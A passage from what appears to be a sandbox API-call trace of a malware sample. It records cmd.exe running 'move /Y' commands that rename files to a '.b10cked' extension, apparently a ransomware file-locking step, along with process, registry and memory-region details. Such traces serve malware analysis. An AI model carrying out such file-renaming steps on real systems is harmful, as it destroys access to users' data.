lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", nBufferLength=0x104, lpBuffer=0x18f440, lpFilePart=0x18f1d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", lpFilePart=0x18f1d8*="MSWINP~1.HXN") returned 0x27 [0204.351] SetErrorMode (uMode=0x0) returned 0x1 [0204.351] SetErrorMode (uMode=0x0) returned 0x0 [0204.352] SetErrorMode (uMode=0x1) returned 0x0 [0204.352] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f648, lpFilePart=0x18f1d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked", lpFilePart=0x18f1d8*="MS.WINPROJ.14.1033.hxn.b10cked") returned 0x39 [0204.352] SetErrorMode (uMode=0x0) returned 0x1 [0204.352] SetLastError (dwErrCode=0x0) [0204.352] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winproj.14.1033.hxn.b10cked")) returned 0xffffffff [0204.352] GetLastError () returned 0x2 [0204.352] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18eb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb54) returned 0x320e70 [0204.352] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x18eb54 | out: lpFindFileData=0x18eb54) returned 0 [0204.352] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.353] GetLastError () returned 0x12 [0204.353] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18eb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb54) returned 0x320e70 [0204.353] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x18eb54 | out: lpFindFileData=0x18eb54) returned 0 [0204.353] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.353] GetLastError () returned 0x12 [0204.917] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331be0) returned 0x320e70 [0204.917] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x331be0 | out: lpFindFileData=0x331be0) returned 0 [0204.917] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.917] GetLastError () returned 0x12 [0204.917] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331be0) returned 0x320e70 [0204.917] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x331be0 | out: lpFindFileData=0x331be0) returned 0 [0204.917] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.917] GetLastError () returned 0x12 [0204.918] _get_osfhandle (_FileHandle=2) returned 0xb [0204.918] GetFileType (hFile=0xb) returned 0x2 [0204.918] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.918] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ed24 | out: lpMode=0x18ed24) returned 1 [0204.918] _get_osfhandle (_FileHandle=2) returned 0xb [0204.918] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ed58 | out: lpConsoleScreenBufferInfo=0x18ed58) returned 1 [0204.918] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.919] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ed98 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.920] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18ed7c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ed7c*=0x2c) returned 1 [0204.920] longjmp () [0204.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.920] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.921] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.921] SetConsoleInputExeNameW () returned 0x1 [0204.921] GetConsoleOutputCP () returned 0x1b5 [0204.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.921] exit (_Code=1) Process: id = "483" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xc84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29441 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29442 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29443 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29444 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29445 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29446 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29447 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29448 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29449 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 29450 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30221 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30222 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30223 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30224 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 30225 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 30226 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30227 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30228 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30229 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30230 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30231 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30232 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30233 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30234 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30235 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 30236 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30237 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30238 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30239 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30240 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30241 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30242 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 30243 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 30244 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 30272 start_va = 0x400000 end_va = 0x4bffff entry_point = 0x400000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 680 os_tid = 0x55c [0204.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fc5c | out: lpSystemTimeAsFileTime=0x18fc5c*(dwLowDateTime=0xaea0de80, dwHighDateTime=0x1d440a9)) [0204.380] GetCurrentProcessId () returned 0xc84 [0204.380] GetCurrentThreadId () returned 0x55c [0204.380] GetTickCount () returned 0x399af [0204.380] QueryPerformanceCounter (in: lpPerformanceCount=0x18fc54 | out: lpPerformanceCount=0x18fc54*=26116957856) returned 1 [0204.381] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.381] __set_app_type (_Type=0x1) [0204.381] __p__fmode () returned 0x76b331f4 [0204.381] __p__commode () returned 0x76b331fc [0204.381] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.382] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.382] GetCurrentThreadId () returned 0x55c [0204.382] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x55c) returned 0x38 [0204.382] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.382] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.382] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.382] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fbec | out: phkResult=0x18fbec*=0x0) returned 0x2 [0204.382] VirtualQuery (in: lpAddress=0x18fc23, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.382] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.382] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.383] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.383] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.383] GetConsoleOutputCP () returned 0x1b5 [0204.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.383] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.383] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.384] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.384] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.384] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.384] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.384] GetEnvironmentStringsW () returned 0x240190* [0204.384] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0204.385] GetEnvironmentStringsW () returned 0x240190* [0204.385] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0204.385] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb5c | out: phkResult=0x18eb5c*=0x40) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0xb8, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x0, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegCloseKey (hKey=0x40) returned 0x0 [0204.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb5c | out: phkResult=0x18eb5c*=0x40) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x0, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x9, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.386] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x9, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.386] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x9, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.386] RegCloseKey (hKey=0x40) returned 0x0 [0204.386] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.386] srand (_Seed=0x5b8863a6) [0204.386] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"" [0204.386] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"" [0204.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.386] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.386] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.387] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.387] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.387] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.387] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.387] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.387] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.387] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.387] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.387] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.387] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.387] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.387] GetEnvironmentStringsW () returned 0x2422e0* [0204.387] FreeEnvironmentStringsW (penv=0x2422e0) returned 1 [0204.387] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.387] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.387] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.387] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.387] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.387] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.387] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.387] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.387] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.387] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f928, lpFilePart=0x18f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f924*="Desktop") returned 0x18 [0204.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.388] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f6a4 | out: lpFindFileData=0x18f6a4) returned 0x240020 [0204.388] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0204.388] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f6a4 | out: lpFindFileData=0x18f6a4) returned 0x240020 [0204.388] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0204.388] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f6a4 | out: lpFindFileData=0x18f6a4) returned 0x240020 [0204.388] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0204.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.388] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.388] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.388] GetEnvironmentStringsW () returned 0x242b00* [0204.389] FreeEnvironmentStringsW (penv=0x242b00) returned 1 [0204.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.389] GetConsoleOutputCP () returned 0x1b5 [0204.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.389] GetUserDefaultLCID () returned 0x409 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa68, cchData=128 | out: lpLCData="0") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fa68, cchData=128 | out: lpLCData="0") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fa68, cchData=128 | out: lpLCData="1") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, 